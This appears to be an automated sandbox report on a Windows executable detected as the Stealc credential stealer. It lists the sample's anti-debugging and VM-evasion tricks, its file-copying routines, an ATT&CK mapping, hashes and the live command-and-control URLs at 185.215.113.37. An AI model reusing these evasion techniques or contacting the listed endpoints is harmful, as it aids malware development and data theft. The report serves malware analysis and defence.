                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58302C8 second address: 58302FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F04D4C79EAAh 0x00000012 xor si, 8BB8h 0x00000017 jmp 00007F04D4C79EABh 0x0000001c popfd 0x0000001d mov dl, al 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58302FA second address: 58302FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58302FE second address: 583031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12034AD second address: 12034B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1041A4C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1041B3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 128CEDD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF68A FindFirstFileA,0_2_00DEF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE1160 GetSystemInfo,ExitProcess,0_2_00DE1160
                Source: file.exe, file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13684
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13681
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13696
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13701
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13736
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00DE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9750 mov eax, dword ptr fs:[00000030h]0_2_00DF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00DF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00DF9600
                Source: file.exe, file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00DF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00DF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00DF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00DF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/rsonation17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                fp2e7a.wpc.phicdn.net
                		192.229.221.95
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpoWfile.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/rsonationfile.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/e2b1563c6670f193.phpEfile.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/KWfile.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php4file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpYfile.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpIhfile.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540731
                            Start date and time:2024-10-24 04:00:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            fp2e7a.wpc.phicdn.nethttp://360mozambique.com/Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://go.board.com/u/MDYzLVhVUC03MjQAAAGWWmuBSHLu2qnjT2fd3i42hMc8hwQGFhiaAKjDUUamE35KumMEYtASBjkNxUKrq50VZoODfB4=Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://www.amalkongsirezeki20245.org-now.info/Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://www.paypal.com/invoice/payerView/details/INV2-N92X-T2Z2-AHQ9-TKQH?locale.x=en_US&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000238&utm_unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&ppid=RT000238&cnac=US&rsta=en_US%28en-US%29&unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&calc=f264059569334&unp_tpcid=invoice-buyer-notification&page=main%3Aemail%3ART000238&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.287.1&tenant_name=&xt=145585%2C134644%2C150948%2C104038&link_ref=details_inv2-n92x-t2z2-ahq9-tkqhGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://email.sg.on24event.com/ls/click?upn=u001.7kf5QUY4LGF7Fzt7LGE4bbPPsSPtBC4KXSPVJqWhtiGKhz4oV3PFLo8UDeLKYv23KHw-2BibCQbosx-2BrYm8YSguIMuXvCpYeqDDvEw6xfy3Div01ANz8r2e-2FhGLQvDi-2BscSWac3BuupWFH6VNOvVWTJC9zO-2BHJCietQ-2FJZFwQgpHI-3D-lRS_d2mIoWmaHN9uElWsaXGXS4tx0xN0zdn5dS-2BOd7-2Fl3QSVFRRmw1zxHoUF8IFkv0vPmX9e-2FpcJrwktm83M8wunod8BspGgLLPEF1if2HBchZeffUo4j9EJFkeG71k3QLUGbt-2BPOzOXmt4QJd92N-2FZHTYo2XD8iUgnUizXXtivzF3d3iwCm-2B4LgJBsV4Xj2wRfUmVe-2BZzLNjzm9yfKXdaFtrYnt3SwNpb5k3iumV8n5Skx7pt7Un0CDOQuxQvoQfT71JluCxsB4NeK-2Fb76-2BFnzVpaElc921KXwzYV6gy0TRcRMyq5WidmSlSRF6xkfJgLjfEzUFzNEG7kEBleVDqxb6JQ-3D-3DGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://vmcsolvo.prismhrperformance.com/Login.aspx?AppraisalId=6724Get hashmaliciousPhisherBrowse
                            • 192.229.221.95
                            https://email.sg.on24event.com/ls/click?upn=u001.7kf5QUY4LGF7Fzt7LGE4bbPPsSPtBC4KXSPVJqWhtiGKhz4oV3PFLo8UDeLKYv23KHw-2BibCQbosx-2BrYm8YSguIMuXvCpYeqDDvEw6xfy3Div01ANz8r2e-2FhGLQvDi-2Bsc6FaIlcwFy323lwaarteGjoXmAWZ77DlZFrOHhjmiQr0-3DAi8m_lHclm8QYORDEd2i1pY8iiMApMxjKNwDzndXGWMwL-2FVaDLkCrIb-2FgQKm-2FutG0KO72H4SwpKalRDTUzZfsGO863iRy8WKrdz16mk5ZOGquq7bqjhyuPTPBO-2B-2FobhNL-2Fiw0sbfNj7OSue-2FIppdS72L8KeReKi2sYygPTTUQ6FAZhpELqizFuVYiSYb7LJ3FcFAt7VFGjIc0LjDO04TCb7Kr3RXi3OZtFXZptudql-2F9FGONhK9uxyg17fFjiwf-2FcA9HXVgOgmHDjs4LDrNR-2BYyJF8UalpN336eGaZthgfCiWJNcRv5lq5bxuf1619fxrkzY38vtDNJAVjrDOY4sJJgNY5A-3D-3DGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://t.co/JJxL0428u4Get hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                            • 192.229.221.95
                            https://app.pandadoc.com/document/v2?token=69b8ae0059c2551a9a27ed1b65653c1a0b5ee1ffGet hashmaliciousUnknownBrowse
                            • 192.229.221.95

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948392018956134
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'918'464 bytes
                            MD5:7cec6eefc34f3702d47fa5a28cbbb929
                            SHA1:dfe6aa0c35d17240cc857447d90614cec2d05b1a
                            SHA256:a6f91d78572a12eb6f938220ee73f01ee43ef6fdfaaedf8439c0be80553dd841
                            SHA512:a8084f055dd47af7fd85131424d7eb1f4f209c976e3147d1f11d0c5632dbc4dedd790f7c65b0811a64a8458a9bea4877a6cc33c5b01b5ee49982ed1fffc2f912
                            SSDEEP:49152:4YSJ4c9/mvcJh6c+6wujKJg2B9ORT/ZpLFnzOf:RSJ4q/Ph6c+6wd9OR/ZHq
                            TLSH:B195336B0AC1D922C3F76FB12A1AE20429254BD4F942CFD15E78F36F560423CA27B5D6
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xac9000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F04D4EF805Ah

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
